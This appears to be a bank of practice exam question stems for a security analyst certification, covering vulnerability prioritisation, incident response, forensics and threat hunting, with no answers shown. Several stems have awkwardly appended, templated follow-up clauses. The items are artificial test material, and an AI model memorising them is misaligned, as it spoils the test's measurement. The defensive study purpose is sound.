Hard200A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed to validate the findings before closing or downgrading them?
Medium201An organization's incident response playbook specifies that after a confirmed malware infection, the infected system should be isolated from the network. Which action best achieves isolation?
Easy202A security team is reviewing firewall logs and identifies traffic to a known malicious IP address from an internal workstation running a critical business application that cannot be interrupted. Which of the following is the most appropriate immediate action?
Easy203A company uses a centralized logging solution. A security analyst receives a log from a host indicating a user account 'jsmith' was created locally on a server. The analyst suspects this is a backdoor account. Which of the following log sources would provide the most context to confirm the creation method and identify the responsible process?
Hard204An organization has a risk acceptance process for vulnerabilities that cannot be remediated immediately. Which of the following should be documented in the risk acceptance paperwork?
Hard205During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?
Medium206An organization's incident response team is handling a ransomware incident where critical servers have been encrypted. The team has identified the ransomware variant and determined that decryption is not possible. Which of the following is the BEST post-incident activity to prevent recurrence?
Hard207After a data breach involving customer PII, the incident response team has contained the incident and eradicated the malware. What is the NEXT step in the remediation process?
Hard208During a vulnerability scan, a security analyst identifies a critical vulnerability with a CVSS v3.1 base score of 9.8. The CVSS vector is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which component of this vector indicates that the vulnerability can be exploited without any user interaction?
Easy209A security analyst discovers a critical vulnerability in a web application that stores customer payment data. The analyst needs to report this to the CISO. Which type of report is most appropriate for communicating the business impact of this vulnerability?
Medium210A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?
Easy211An analyst is examining a disk image acquired from a compromised Linux server. The analyst needs to verify that the image is an exact bit-for-bit copy of the original drive. Which forensic sound procedure should the analyst perform?
Medium212During a containment phase of an incident response, the team needs to prevent an infected host from communicating with a command-and-control server. The host is a critical database server that cannot be taken offline. Which of the following containment strategies is most appropriate?
Medium213An analyst is reviewing a Nessus scan report and sees a plugin result that indicates a web application is vulnerable to SQL injection. The plugin output includes the payload used and the database error message. Which OWASP Top 10 category does this vulnerability belong to?
Medium214Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?
Easy215During dynamic analysis of a malware sample in a sandbox, the analyst observes that the malware attempts to connect to an IP address 198.51.100.23 and modifies the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which IOC type is the IP address an example of?
Medium216A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is legal/privacy stakeholder, which content choice is most appropriate?
Medium217A Kubernetes audit alert shows a service account creating privileged pods. Which checks are most relevant? (Choose two.)
Hard218Which of the following is the FIRST step in the NIST SP 800-61 incident response lifecycle?
Easy219During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?
Medium220During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for a recent breach was 14 days, while the mean time to respond (MTTR) was 6 hours. Which metric should the team prioritize to improve in future incidents?
Medium221A security team is implementing configuration management for a set of Linux servers in a non-DoD environment. They want to apply a security baseline that provides a balanced approach between security and operational efficiency. Which of the following would be most appropriate?
Medium222A cybersecurity analyst needs to communicate the risk of a newly discovered vulnerability in a legacy system to the executive leadership. Which approach best translates the technical risk into business risk?
Medium223A business unit accepts the risk of delaying a patch because downtime would breach a contractual deadline. What should be updated? For stakeholder management, Which documentation or approval is required to keep the programme defensible?
Medium224Which TWO of the following are best practices for securing a network firewall configuration? (Choose two.)
Easy225A supplier provides a software product used in a regulated environment. The security team wants visibility into included libraries and versions. What should they request? For tool configuration, Which scanner or pipeline change most directly improves result quality?
Easy226A security analyst is configuring a container scanning tool to identify vulnerabilities in Docker images before deployment. Which of the following tools is specifically designed for container image vulnerability scanning?
Medium227During an incident, which of the following should be the FIRST priority when communicating with law enforcement?
Medium228A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?
Medium229During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for incidents is significantly higher than industry benchmarks. Which of the following improvements would most directly reduce MTTD?
Hard230An organization has identified indicators of compromise (IOCs) from a recent incident. Which data format is specifically designed for sharing threat intelligence in a standardized, machine-readable way?
Easy231During a post-incident review, the CSIRT identifies that the mean time to detect (MTTD) is significantly higher than the industry benchmark. Which initiative would MOST likely reduce MTTD?
Medium232A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?
Medium233An analyst is prioritizing vulnerabilities for remediation. The vulnerability has a high CVSS score but is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog and has a low EPSS score. The affected asset is a publicly accessible web server handling sensitive customer data. Which factor should the analyst consider as most critical for prioritization?
Medium234During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?
Hard235Refer to the exhibit. A security auditor finds this IAM policy attached to a user account. Which of the following describes the primary security concern?
Hard236A third-party provider caused an outage during remediation. What should the communication to the vendor focus on? If the primary audience is legal/privacy stakeholder, which content choice is most appropriate?
Easy237Which THREE elements are essential components of a comprehensive post-incident report?
Hard238An analyst needs to capture the contents of volatile memory from a Windows system suspected of being compromised. Which tool should the analyst use to acquire a memory image?
Easy239An analyst runs a YARA rule against a set of files and gets a hit. The rule was written to detect a specific malware family. What is the PRIMARY purpose of using YARA rules in this context?
Hard240A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?
Medium241A supplier provides a software product used in a regulated environment. The security team wants visibility into included libraries and versions. What should they request? For control selection, Which control best addresses the stated weakness without hiding risk?
Easy242An analyst uses Trivy to scan a container image in a CI/CD pipeline. The scan identifies a vulnerability in an open-source library included in the image. The library is not used by the application code. Which of the following actions should the analyst recommend?
Medium243A vulnerability scan of a segmented OT network must avoid disrupting fragile devices. Which controls are appropriate? (Choose two.)
Hard244Which of the following is the BEST method to prioritize vulnerabilities for remediation?
Easy245An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?
Hard246Which metric measures the average time it takes for an organization to identify a security incident from the moment it occurs?
Easy247A security analyst is reviewing the output of a vulnerability scan and sees a finding for a web application that uses a known vulnerable version of Apache Struts. Which TWO of the following actions should the analyst prioritize?
Medium248During a post-incident review, the security team needs to communicate findings to the IT operations team. Which communication method is MOST effective for this audience?
Easy249A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?
Medium250A company uses Lynis for compliance scanning on Linux servers. During a scan, Lynis reports that the system has world-writable files in critical directories. Which CIS Benchmark recommendation does this finding relate to?
Medium251A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is executive leadership, which content choice is most appropriate?
Medium252A security analyst is reviewing logs from a network intrusion detection system (NIDS) and sees the following alert: "ET TROJAN Possible ZeuS/Poison Ivy Activity". The analyst wants to verify if the traffic is malicious. Which TWO of the following actions should the analyst take? (Select two.)
Medium253A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?
Easy254A SOC analyst receives an alert about a potential data exfiltration via DNS tunneling. Which of the following tools would best help the analyst investigate the alert?
Easy255Which type of threat intelligence report is MOST appropriate for a Chief Information Security Officer (CISO) to understand the overall threat landscape and make strategic decisions?
Easy256An application has a high CVSS vulnerability, but a WAF rule blocks known exploit payloads. What should the team still do? (Choose two.)
Hard257A security analyst is preparing an after-action report for a phishing incident. Which component is MOST critical to include to prevent recurrence?
Medium258A vulnerability appears critical but the vulnerable feature is disabled. What should the analyst document before downgrading? (Choose two.)
Hard259A post-incident report finds that no one owned a failed alert integration. What should the corrective action include? If the primary audience is SOC manager, which content choice is most appropriate?
Hard260During an audit, the compliance team needs to provide evidence that access reviews are performed regularly. Which of the following is the BEST evidence?
Hard261During a ransomware incident, the incident response team needs to preserve evidence before containment. Which of the following actions should be performed BEFORE isolating the infected system from the network?
Hard262A post-incident report finds that no one owned a failed alert integration. What should the corrective action include?
Hard263During a post-incident review, the team finds that the detection was delayed by 4 hours because the SIEM rule had a low priority and was not monitored after hours. Which improvement is most effective?
Hard264A security analyst detects unusual outbound traffic from a workstation. Which immediate action should the analyst take?
Easy265Which vulnerability scanner is an open-source tool commonly used for network vulnerability scanning?
Easy266During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?
Hard267A security analyst is investigating a potential malware infection on a Windows workstation. The analyst needs to collect evidence while preserving the order of volatility. Which TWO pieces of data should the analyst collect FIRST? (Select TWO)
Medium268During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?
Medium269A security analyst is investigating a potential data breach and needs to collect evidence from a compromised Windows server. The server is still running, and the analyst wants to capture memory, network connections, and process list without writing unnecessary data to disk. Which of the following sequences of commands (tools) should the analyst use to adhere to order of volatility?
Hard270During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?
Easy271A cybersecurity analyst is preparing a report for the executive leadership team. Which type of report is most appropriate for communicating high-level security posture and risk to non-technical stakeholders?
Easy272After containing a data breach, the incident response team discovers that an attacker exfiltrated sensitive data over DNS tunneling. Which of the following detection rules would BEST identify similar activity in the future?
Hard273A cybersecurity analyst is preparing a vulnerability report for the IT manager. Which section should summarize the most critical risks for the organization?
Easy274A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is business service owner, which content choice is most appropriate?
Medium275A company uses a patch management tool to track compliance across its server fleet. The security team needs to prioritize vulnerabilities for patching. Which THREE factors should be considered when prioritizing?
Medium276You are a security analyst for a mid-sized financial services company. At 2:30 PM, the endpoint detection and response (EDR) console alerts on three workstations in the accounting department, indicating that files are being encrypted with a '.encrypt' extension and a ransom note named 'READ_ME_NOW.html' has been dropped. The workstations are connected to a file server that hosts shared financial records and a domain controller that handles authentication. The file server and domain controller have not shown signs of compromise yet. Your incident response plan states that containment must begin within 15 minutes of detection. Based on your analysis of the EDR telemetry, the encryption process appears to be spreading via SMB connections from the first infected workstation. Which of the following is the BEST immediate containment action to prevent further spread while preserving evidence?
Medium277A cloud security analyst is reviewing a misconfiguration in an AWS S3 bucket that allows public read access. The bucket contains sensitive customer data. Which of the following CIS AWS Foundations Benchmark checks would most likely identify this issue?
Hard278A security analyst is configuring a vulnerability scan using OpenVAS. The scan should identify missing patches on Windows servers. Which of the following scan types should the analyst select?
Medium279During which phase of the NIST SP 800-61 incident response lifecycle would an organization conduct a lessons learned meeting?
Easy280A security analyst is using OpenVAS to scan a network. The scan identifies several vulnerabilities. Which TWO of the following are valid components of a CVSS v3.1 base score? (Select the two correct answers.)
Medium281During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?
Hard282A security analyst is reviewing a Kubernetes cluster configuration. Which of the following misconfigurations poses the MOST severe security risk?
Medium283A security analyst is preparing a vulnerability report for management. Which TWO elements should be included in the executive summary? (Select TWO.)
Medium284A security analyst needs to present a risk register to a non-technical board. Which of the following formats is most appropriate?
Medium285Which three of the following are best practices for integrating vulnerability scanning into a continuous integration/continuous deployment (CI/CD) pipeline? (Choose three.)
Medium286Which metric measures the average time it takes to identify a security incident from the moment it occurs?
Easy287A security analyst is prioritizing vulnerabilities for a critical internet-facing application server. The analyst has CVSS scores, EPSS scores, and access to the CISA KEV catalog. Which TWO factors should the analyst consider as the most important for determining remediation priority? (Select TWO)
Medium288A security analyst is reviewing vulnerability scan results and notices that a critical vulnerability on a web server has a CVSS v3.1 base score of 9.8 with the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which component of the CVSS vector indicates that the vulnerability can be exploited from a remote network?
Easy289A security team is using EPSS scores and CISA KEV catalog to prioritize vulnerabilities. Which combination of factors would indicate the HIGHEST priority for remediation?
Hard290A security analyst is using Nessus to scan a network. The scan completes and reports a vulnerability with a CVSS v3.1 base score of 5.3 and vector AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N. The vulnerability is a low-information disclosure issue that reveals the server's internal IP address in HTTP headers. The asset is a public-facing web server. Which of the following best describes the risk level and appropriate response?
Hard291After a security incident involving a ransomware attack, the organization needs to communicate with various stakeholders. Which THREE of the following are appropriate actions? (Select THREE.)
Hard292A security analyst is reviewing the results of a vulnerability scan and notices that several vulnerabilities have high CVSS scores but low EPSS scores. The analyst also cross-references the CISA Known Exploited Vulnerabilities (KEV) catalog and finds that none of these vulnerabilities are listed. Which approach should the analyst take when prioritizing remediation?
Medium293A security analyst is prioritizing vulnerabilities discovered during a scan. Which TWO factors should the analyst consider as part of business context to determine remediation priority? (Select TWO.)
Medium294Which metric measures the average time taken to fix a vulnerability after it is identified?
Easy295A responder is acquiring evidence from a potentially compromised server. Which actions support forensic integrity? (Choose two.)
Hard296A security analyst is configuring a vulnerability scan for a demilitarized zone (DMZ) containing public-facing web servers. The analyst wants to minimize the risk of causing a denial-of-service condition on the servers. Which of the following scan settings should be configured?
Medium297A cloud workload identity begins accessing secrets outside its normal application scope. Which evidence should be reviewed? (Choose two.)
Hard298A vulnerability dashboard for executives should avoid raw technical overload. Which views are useful? (Choose two.)
Hard299A vulnerability report is presented to the IT manager. The report lists 15 critical, 40 high, 100 medium, and 200 low vulnerabilities. The IT manager asks which vulnerabilities should be prioritized for remediation. According to the vulnerability report structure, which section should the analyst reference?
Medium300Match each security tool to its primary purpose.
Medium301A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?
Hard302A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)
Medium303A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?
Easy304A security analyst detects ransomware on a critical server. Which containment strategy should be implemented FIRST to minimize damage?
Medium305Which of the following log sources would be most useful for detecting DNS tunneling?
Easy306A critical vulnerability affected the customer portal, but no evidence of exploitation was found. What should the executive summary emphasize? If the primary audience is executive leadership, which content choice is most appropriate?
Easy307An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?
Medium308Refer to the exhibit. An analyst reviews the output from a netstat command on a server. Which connection is MOST likely indicative of command and control (C2) activity?
Medium309Which THREE of the following are common challenges in vulnerability management? (Select THREE)
Easy310An analyst runs a command to check active network connections on a Linux host and sees many ESTABLISHED connections to an external IP on port 443. Which command was most likely used?
Easy311After a data breach incident, a post-incident review team is collecting lessons learned. Which THREE items should be included in the lessons learned documentation?
Hard312An organization needs to report a data breach involving personal data of EU residents. Under GDPR, what is the maximum time allowed for notifying the supervisory authority after becoming aware of the breach?
Hard313A security analyst is investigating a potential data exfiltration incident. The analyst captures memory from a Windows system and finds a process that is injecting code into other processes. Which THREE indicators from the memory analysis would MOST strongly suggest malicious activity? (Select THREE.)
Hard314An incident responder is collecting evidence from a compromised Linux server. The server is still running. Which order of collection adheres to the order of volatility?
Hard315During a vulnerability scan, a security analyst identifies a critical vulnerability with a CVSS v3.1 base score of 9.8. The attack vector is network, attack complexity is low, privileges required are none, user interaction is none, and the impact to confidentiality, integrity, and availability is high. Which CVSS vector string represents this vulnerability?
Easy316A security analyst is reviewing a vulnerability scan report and notices a critical vulnerability with a CVSS v3.1 base score of 9.8. The vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector and the scope impact?
Medium317Which TWO of the following are common indicators of compromise (IOCs) that can be identified through log analysis?
Easy318During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?
Hard319A security analyst is reviewing a vulnerability scan of a Kubernetes cluster. The scan reports that a container is running with privileged mode enabled. Which CIS Kubernetes Benchmark recommendation does this violation relate to?
Hard320A security analyst is classifying an incident where an employee's workstation is infected with ransomware that encrypts files and displays a ransom note. Which incident category and severity level best describe this scenario?
Easy321A security analyst is creating a risk register. Which of the following is the most important element to include for each risk?
Medium322A security analyst needs to share threat intelligence data with a partner organization as part of an information sharing agreement. Which of the following is the most critical consideration before sharing the data?
Hard323During a patch management process, a security analyst is testing a critical security patch in a staging environment. The patch is intended to fix a remote code execution vulnerability in a widely used application. What is the MOST important step before deploying to production?
Medium324A vulnerability scan identifies a critical unauthenticated remote-code-execution flaw on an internet-facing VPN appliance that is actively exploited in the wild. Several internal-only medium vulnerabilities are also present. What should be remediated first? For business prioritization, Which recommendation gives the best risk-based order of work?
Easy325A security engineer needs to implement a baseline configuration for all new Linux servers. Which of the following should be included in the baseline to reduce the attack surface?
Easy326A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?
Medium327A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?
Medium328An organization uses a DAST tool to test a web application for vulnerabilities. The tool sends specially crafted requests and analyzes responses. Which of the following vulnerabilities is a DAST tool most effective at identifying?
Medium329A security analyst is selecting Key Performance Indicators (KPIs) for a security operations dashboard. Which THREE metrics are most relevant for measuring incident response effectiveness? (Select THREE.)
Medium330A security analyst is using OpenSCAP to perform a compliance scan against a set of RHEL servers. The analyst wants to ensure the servers comply with the CIS Benchmark Level 1 for Red Hat Enterprise Linux. What does Level 1 typically indicate?
Medium331A vulnerability management team is evaluating whether to apply a patch immediately or implement a compensating control. The patch is for a vulnerability in a legacy system that cannot be taken offline during business hours. The compensating control would involve restricting network access to the system. Which decision is MOST appropriate?
Medium332An organization uses CIS Benchmarks to secure its Linux servers. The security team applies Level 1 benchmarks. Which of the following best describes Level 1 CIS benchmarks?
Easy333An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?
Medium334A security analyst is reviewing indicators of compromise (IOCs) from a recent phishing campaign. Which of the following is an example of an email-related IOC?
Easy335Which SIEM component is responsible for centralizing and correlating logs from multiple sources?
Easy336A security analyst has identified a critical vulnerability that affects multiple systems. The analyst needs to report the vulnerability to management. Which THREE elements should be included in the vulnerability report? (Choose three.)
Hard337A security analyst is prioritizing vulnerabilities for remediation. One vulnerability has a CVSS v3.1 score of 7.5, an EPSS score of 0.02, and is not in the CISA KEV catalog. Another vulnerability has a CVSS score of 5.0, an EPSS score of 0.85, and is listed in the KEV catalog. Which vulnerability should be prioritized FIRST?
Medium338An analyst views the above SIEM logs from a Linux server. Which of the following attacks is MOST likely occurring?
Hard339Match each threat intelligence source to its description.
Medium340A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?
Medium341An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?
Hard342Refer to the exhibit. An analyst sees this alert in the SIEM console: Suricata alert: ET MALWARE Ransomware activity detected from 10.0.0.5 to 10.0.0.1 over SMB. What is the best immediate action?
Medium343During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?
Medium344A malware alert shows a signed binary performing suspicious actions. Which facts help decide whether it is living-off-the-land abuse? (Choose two.)
Hard345A security analyst must prepare a report on a recent intrusion for a technical audience (IT staff and security engineers). Which TWO elements should be included?
Medium346A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?
Easy347An incident responder needs to collect forensic evidence from a server that was attacked. The evidence includes network connections, running processes, memory contents, and disk data. According to the order of volatility, which piece of evidence should the responder collect FIRST?
Medium348During the preparation phase of the NIST SP 800-61 incident response lifecycle, a security analyst is tasked with ensuring the team has the necessary tools and resources. Which of the following is the MOST important activity to perform during this phase?
Easy349A security analyst is collecting evidence for an upcoming compliance audit. Which three types of evidence are typically required? (Select THREE.)
Hard350A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For validation, Which action should be taken before closing or downgrading the finding?
Hard351A security analyst is reviewing the results of a recent vulnerability scan. The analyst needs to prioritize remediation efforts effectively. Which four of the following factors should the analyst consider when prioritizing vulnerabilities? (Choose four.)
Medium352An organization uses MISP as its threat intelligence platform. After a security incident, the team wants to share IOCs with other trusted organizations. Which standard should they use to package and exchange the threat intelligence?
Easy353A security analyst is prioritizing vulnerabilities for remediation. The following vulnerabilities have been identified: Vulnerability A: CVSS v3.1 Base Score 9.8 (Critical), no known exploit, affects internet-facing web server. Vulnerability B: CVSS v3.1 Base Score 7.5 (High), exploit available, affects internal database server. Vulnerability C: CVSS v3.1 Base Score 6.1 (Medium), exploit available, affects internal file server. Vulnerability D: CVSS v3.1 Base Score 4.0 (Medium), no known exploit, affects internal workstation. Which vulnerability should be remediated FIRST?
Hard354A small business with 50 employees has been hit by ransomware. All files on the file server and local workstations are encrypted, and the ransom note demands $5,000 in Bitcoin for the decryption key. The CEO is panicking and wants to know the impact on operations and how to proceed. The security analyst has been tasked with preparing a report for the CEO. The company does not have cyber insurance, has minimal IT staff, and relies heavily on email and shared drives for daily operations. The analyst has identified that there is a one-week-old backup but is unsure of its integrity. The analyst must consider that the CEO has limited technical knowledge and that the report will form the basis for critical business decisions. The company's reputation and customer trust are at stake. The analyst must balance transparency with clear, actionable guidance. Which of the following is the BEST approach for the analyst to take in communicating with the CEO?
Easy355An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?
Hard356An incident response team is conducting post-incident activities after a ransomware attack. The team wants to improve detection and response for future incidents. Which TWO actions are most appropriate for updating detection rules? (Select TWO.)
Medium357Which tool is specifically designed to check Linux systems for compliance with security best practices and can be used for configuration auditing?
Easy358A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?
Medium359An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?
Medium360A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the evidence source phase, Which evidence source best supports or refutes the detection?
Hard361A security analyst is communicating a complex security risk about a new zero-day vulnerability to the board of directors. The board members have varying technical backgrounds. Which approach would be MOST effective?
Hard362Which of the following tools is specifically designed for compliance scanning against security benchmarks on Linux systems?
Easy363A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant?
Easy364During an incident, the security team needs to preserve evidence for potential litigation. Which of the following actions is most critical to ensure the admissibility of digital evidence?
Hard365An analyst is investigating a possible data exfiltration incident. The analyst has acquired a memory dump from the compromised system. Which of the following would be the BEST approach to extract evidence of exfiltration?
Hard366A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?
Medium367You are a senior incident responder for a large technology company. During a routine threat hunting exercise, you detect unusual network traffic from a Linux web server to an external IP address that is known to be associated with an advanced persistent threat (APT) group. The web server runs a custom PHP application and is not in the DMZ; instead, it's on the internal network serving a management dashboard. You have captured a memory dump of the web server and analyzed it with volatility. The output shows a suspicious process running with the name 'apache2' but with an invalid parent process (PID 1 is 'apache2' itself). Additionally, you find a kernel module loaded called 'hideproc.ko' that is not part of the standard kernel. The network connections show a reverse shell to the external IP. You need to determine the most effective containment and eradication strategy that minimizes data loss and maintains business continuity while preserving evidence for law enforcement involvement.
Hard368An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?
Hard369Order the steps for proper forensic acquisition of a hard drive.
Medium370A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is SOC manager, which content choice is most appropriate?
Hard371An organization wants to prioritize vulnerabilities based on the likelihood of exploitation. Which of the following sources provides a data-driven probability score for exploitation?
Medium372During a security assessment, you discover that an organization's web application is vulnerable to SQL injection because it concatenates user input directly into SQL queries. Which of the following is the BEST remediation strategy?
Hard373During post-incident activities, the security team reviews metrics. Which metric measures the average time taken to detect an incident?
Medium374A security analyst has identified a critical vulnerability in a customer-facing web application. The analyst needs to communicate this to senior management. Which of the following is the best approach for this communication?
Easy375A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?
Medium376Arrange the steps for conducting a security incident response in the correct order.
Medium377During dynamic analysis of a suspicious file in a sandbox environment, which THREE behaviors are considered indicators of compromise (IOCs) that suggest malicious activity? (Choose THREE.)
Medium378During a phishing incident, an analyst extracts a URL from the email body and searches VirusTotal. The URL is associated with a credential harvesting page. Which type of indicator is this URL?
Medium379A critical vulnerability affected the customer portal, but no evidence of exploitation was found. What should the executive summary emphasize? If the primary audience is legal/privacy stakeholder, which content choice is most appropriate?
Easy380During a vulnerability assessment, a security analyst uses a tool that identifies missing patches and misconfigurations based on CIS Benchmarks. Which of the following tools is specifically designed for compliance scanning against CIS benchmarks?
Easy381A security analyst is reviewing the results of a vulnerability scan. The analyst sees a plugin output that includes the CVSS vector string AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. What is the base score of this vulnerability?
Easy382A root-cause analysis finds that an alert fired but was never triaged. Which corrective actions are useful? (Choose two.)
Hard383A company wants to prioritize vulnerabilities based on exploitability and impact. Which industry standard framework should the analyst use?
Medium384An organization is implementing a new security incident response plan and wants to establish clear communication protocols. Which three of the following are essential components of effective incident communication? (Choose three.)
Medium385Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. What changes the remediation priority? For business prioritization, Which recommendation gives the best risk-based order of work?
Easy386A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)
Medium387A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)
Hard388During a phishing investigation, an employee reports clicking a link and entering credentials. Which of the following should be the first step?
Easy389A security team is implementing CIS Benchmarks for a Linux server. They need to choose between Level 1 and Level 2 benchmarks. Which of the following best describes Level 1 benchmarks?
Medium390During a web application penetration test using Burp Suite, a security analyst identifies that an API endpoint accepts a URL parameter that is used to fetch data from an external resource. The application does not validate or sanitize the parameter. This is most likely vulnerable to which attack?
Hard391A cybersecurity analyst is preparing a threat intelligence report for the SOC team. Which type of intelligence should be included to provide actionable indicators of compromise (IoCs)?
Hard392Which technology is specifically designed to detect anomalous user behavior that may indicate a compromised account?
Easy393An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?
Medium394A vulnerability report is going to system owners. Which elements make it actionable? (Choose three.)
Medium395A host is suspected of running fileless malware. Which artefacts should be collected quickly? (Choose two.)
Hard396Which of the following vulnerability lifecycle phases involves verifying that a remediation has been successfully applied and that the vulnerability no longer exists?
Easy397A security operations center (SOC) analyst is investigating an alert from the endpoint detection and response (EDR) system indicating that a process named "svchost.exe" spawned from a parent process "cmd.exe" on a user workstation. The user is a software developer who frequently uses command-line tools. The analyst checks the command line arguments: "cmd.exe /c powershell -EncodedCommand ...". The encoded command decodes to a script that downloads a payload from a remote server and executes it. The analyst also sees that the workstation has established an outbound connection to the same server on port 443. Which of the following is the BEST immediate action?
Medium398During a vulnerability scan, an analyst discovers a high-severity vulnerability on a critical database server. The server is in production and cannot be taken offline. The vendor has released a patch but requires a reboot. Which of the following should the analyst recommend FIRST?
Medium399A vulnerability report is being prepared for an organization's management. Which of the following is the MOST appropriate structure for this report?
Hard400Which TWO of the following are best practices for vulnerability scanning in a PCI DSS compliant environment? (Select TWO)
Medium401An organization is preparing for a compliance audit. Which TWO of the following are essential pieces of evidence to demonstrate effective vulnerability management?
Hard402An organization has experienced a data breach involving personal data of EU residents. Under GDPR, what is the maximum time frame within which the organization must notify the supervisory authority?
Hard403A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?
Medium404A security analyst needs to present the risk of an unpatched critical vulnerability to the board of directors. Which of the following is the most effective way to communicate the risk?
